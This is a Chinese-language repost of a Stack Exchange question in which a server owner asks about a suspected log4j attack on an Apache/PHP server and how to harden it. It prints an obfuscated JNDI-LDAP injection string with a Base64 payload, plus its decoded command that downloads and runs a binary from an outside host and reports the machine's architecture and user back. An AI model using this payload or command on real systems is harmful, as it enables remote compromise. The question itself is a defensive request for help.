You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

Apache服务器疑似wget+log4j攻击的安全疑问及加固建议求助

Apache服务器疑似wget+log4j攻击的安全疑问及加固建议求助

我不是IT或Apache方面的专家,但已经用Linux很多年了。我尽最大努力加固了自己的线上服务器——这台服务器是给一款移动App提供内容服务的。

今天我发现有针对我的Apache 2.4.57服务器的疑似攻击行为,看起来是用wget和log4j来搞事?不过我的服务器上没有Tomcat,只是运行着PHP的简单httpd服务。

下面是一条日志条目(我把日志里的IP地址替换成了X.X.X.X),注意这里返回的状态码是200,意味着请求“成功”了:

[Sat Apr 08 16:08:57.428096 2023] [http:trace3] [pid 15227:tid 140593883580160] http_filters.c(1132): [client X.X.X.X:52832] Response sent with status 200, referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//X.X.X.X:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY3VybCAtTyBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY2htb2QgK3ggemxpYjQ1IDsgY2htb2QgNzc3IHpsaWI0NSA7IC4vemxpYjQ1IDIgOyBzdWRvIC4vemxpYjQ1IDIgOyBybSAtcmYgemxpYjQ1OyBjdXJsIGh0dHA6Ly8xMjkuMTUxLjY0LjU1L2FyY2gvJCh1bmFtZSAtbSkvdXNlci8kKHdob2FtaSk7IHN1ZG8gY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkp}')

把日志里的Base64部分解码后,得到的命令如下(同样替换了里面的IP地址):

wget http://X.X.X.X/.config/zlib45 ; curl -O http://X.X.X.X/.config/zlib45 ; chmod +x zlib45 ; chmod 777 zlib45 ; ./zlib45 2 ; sudo ./zlib45 2 ; rm -rf zlib45; curl http://X.X.X.X/arch/$(uname -m)/user/$(whoami); sudo curl http://X.X.X.X/arch/$(uname -m)/user/$(whoami)

我已经把wget可执行文件重命名成了一个不容易猜到的名字,比如wget_wget。另外我的服务器上没有Java环境,也搜索过log4j相关文件,没找到(不过会不会藏在Apache的可执行文件里?)。

现在我有几个疑问:

  • 移除/重命名wget是不是提升安全性的好办法?
  • 既然我的系统里wget已经不能按原名执行了,为什么请求还返回了200状态码?
  • 那些命令真的在我的服务器上执行了吗?
  • 根据日志内容来看,我的系统真的在运行/被利用了log4j吗?

我还看到很多来自同一个IP的类似日志条目,所以想听听更专业的看法——到底这是怎么回事,还有哪些办法能更好地加固服务器?我已经在用fail2ban,但它好像拦不住这类攻击。

麻烦大家给点建议,提前谢过了!

备注:内容来源于stack exchange,提问作者Tim

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.04.22 14:53:06